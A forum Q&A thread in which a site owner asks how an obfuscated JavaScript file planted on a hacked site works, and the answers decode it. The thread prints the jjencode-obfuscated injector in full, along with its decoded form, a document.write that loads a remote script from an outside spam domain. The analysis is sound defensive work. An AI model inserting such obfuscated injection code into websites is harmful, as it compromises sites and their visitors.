Very interesting Javascript Obfuscation. Help understanding it

Question

I found out one of my sites was hacked, and upon investigation, I looked at a javasript file that was uploaded and I couldn't believe that it actually served a purpose due to the insane obfuscation.

I'm so intrigued with it that I need to know how the hell this even works. If anyone can provide any information that is greatly appreciated! Plus this will help me find out other hidden hacked files on my server!

Here are the contents:

$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+".\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+$.__+$.$$$_+"(\\\"<\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\"+$.$__+$.___+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"=\\\\\\\"\\"+$.__$+$.$_$+$.___+$.__+$.__+"\\"+$.__$+$.$$_+$.___+"://"+$.$$_$+"\\"+$.__$+$.$_$+$.$$_+"\\"+$.__$+$.$$_+$._$$+"-\\"+$.__$+$.$$_+$._$$+$.$$$_+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$$_+$.$$_+$.$$$_+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.___+$._$+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"."+$.$$__+$._$+"\\"+$.__$+$.$_$+$.$_$+"/\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\"+$.__$+$.$$_+$._$$+"/"+$.__+"\\"+$.__$+$.$$_+$._$_+$.$_$_+"\\"+$.__$+$.$_$+$.$_$+$.$_$_+$.$$_$+$._$+(![]+"")[$._$_]+"/\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$_$+$.__$+$.$$_$+$.$$$_+$.$_$$+$.$_$_+"\\"+$.__$+$.$$_+$._$_+".\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+"\\\\\\\"></\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+">\\\");"+"\"")())();

Answer 1

I ran it in the console - it seems to replace the website's HTML with spam links trying to sell drugs - "Generic Viagra $108" etc.

Answer 2

First, add some whitespace:

$ = ~ [];
$ = {
    ___: ++$,
    $$$$: (![] + "")[$],
    __$: ++$,
    $_$_: (![] + "")[$],
    _$_: ++$,
    $_$$: ({} + "")[$],
    $$_$: ($[$] + "")[$],
    _$$: ++$,
    $$$_: (!"" + "")[$],
    $__: ++$,
    $_$: ++$,
    $$__: ({} + "")[$],
    $$_: ++$,
    $$$: ++$,
    $___: ++$,
    $__$: ++$
};
$.$_ = ($.$_ = $ + "")[$.$_$]
    + ($._$ = $.$_[$.__$])
    + ($.$$ = ($.$ + "")[$.__$])
    + ((!$) + "")[$._$$]
    + ($.__ = $.$_[$.$$_])
    + ($.$ = (!"" + "")[$.__$])
    + ($._ = (!"" + "")[$._$_])
    + $.$_[$.$_$]
    + $.__
    + $._$
    + $.$;
$.$$ = $.$
    + (!"" + "")[$._$$]
    + $.__
    + $._
    + $.$
    + $.$$;
$.$ = ($.___)[$.$_][$.$_];
$.$($.$(
    $.$$
    + "\"" + $.$$_$ + $._$ + $.$$__ + $._
    + "\\" + $.__$ + $.$_$ + $.$_$ + $.$$$_
    + "\\" + $.__$ + $.$_$ + $.$$_ + $.__
    + ".\\" + $.__$ + $.$$_ + $.$$$
    + "\\" + $.__$ + $.$$_ + $._$_
    + "\\" + $.__$ + $.$_$ + $.__$ + $.__ + $.$$$_
    + "(\\\"<\\" + $.__$ + $.$$_ + $._$$ + $.$$__
    + "\\" + $.__$ + $.$$_ + $._$_
    + "\\" + $.__$ + $.$_$ + $.__$
    + "\\" + $.__$ + $.$$_ + $.___ + $.__
    + "\\" + $.$__ + $.___
    + "\\" + $.__$ + $.$$_ + $._$$
    + "\\" + $.__$ + $.$$_ + $._$_ + $.$$__
    + "=\\\\\\\"\\" + $.__$ + $.$_$ + $.___ + $.__ + $.__
    + "\\" + $.__$ + $.$$_ + $.___ + "://" + $.$$_$
    + "\\" + $.__$ + $.$_$ + $.$$_
    + "\\" + $.__$ + $.$$_ + $._$$
    + "-\\" + $.__$ + $.$$_ + $._$$ + $.$$$_
    + "\\" + $.__$ + $.$$_ + $._$_
    + "\\" + $.__$ + $.$$_ + $.$$_ + $.$$$_
    + "\\" + $.__$ + $.$$_ + $._$_
    + "\\" + $.__$ + $.$_$ + $.___ + $._$
    + "\\" + $.__$ + $.$_$ + $.$_$ + $.$$$_ + "." + $.$$__ + $._$
    + "\\" + $.__$ + $.$_$ + $.$_$
    + "/\\" + $.__$ + $.$$_ + $._$$ + $.$$__
    + "\\" + $.__$ + $.$$_ + $._$_
    + "\\" + $.__$ + $.$_$ + $.__$
    + "\\" + $.__$ + $.$$_ + $.___ + $.__
    + "\\" + $.__$ + $.$$_ + $._$$
    + "/" + $.__
    + "\\" + $.__$ + $.$$_ + $._$_ + $.$_$_
    + "\\" + $.__$ + $.$_$ + $.$_$ + $.$_$_ + $.$$_$ + $._$ + (![] + "")[$._$_]
    + "/\\" + $.__$ + $.$$_ + $._$$ + "\\" + $.__$ + $.$_$ + $.__$ + $.$$_$ + $.$$$_ + $.$_$$ + $.$_$_
    + "\\" + $.__$ + $.$$_ + $._$_ + ".\\" + $.__$ + $.$_$ + $._$_
    + "\\" + $.__$ + $.$$_ + $._$$
    + "\\\\\\\"></\\"
    + $.__$ + $.$$_ + $._$$ + $.$$__
    + "\\" + $.__$ + $.$$_ + $._$_
    + "\\" + $.__$ + $.$_$ + $.__$
    + "\\" + $.__$ + $.$$_ + $.___ + $.__
    + ">\\\");"
    + "\""
)())();

1. Everything but the last statement is creating the object $ whose values are mostly numbers and strings, like "f", 8, and "return".

Of particular significance, however, is $.$, which is Function. Calling Function(s) creates a function whose body is s.

For example, Function('return 1;') returns function() { return 1; }.

Essentially, Function(s)() (or in this case, $.$(s)()) is the equivalent of eval(s).

2. All the string concatenations in that last statement create a string.

return"docu\155e\156t.\167\162\151te(\"<\163c\162\151\160t\40\163\162c=\\\"\150tt\160://d\156\163-\163e\162\166e\162\150o\155e.co\155/\163c\162\151\160t\163/t\162a\155adol/\163\151deba\162.\152\163\\\"></\163c\162\151\160t>\");\"

3. which when evaluated with $.$ returns as a string

document.write("<script src=\"http://dns-serverhome.com/scripts/tramadol/sidebar.js\"></script>");

4. Calling $.$ a second time on this result completes the attack.

This code is clearly intended to appear as innocuous as possible, by not using eval, Function, function, or any HTML entities like <.

The double call to Function that IMO are not necessary, but I suppose it further obfuscates the code.

Now, as to you final question, do you intend to be running 3rd party Javascript? If so, the only robust framework I know of for something like that is Google Caja.

EDIT: This appears to be the result of jjencode for

document.write("<script src=\"http://dns-serverhome.com/scripts/tramadol/sidebar.js\"></script>");

jjencode even has the option to return a palindromic obfuscation.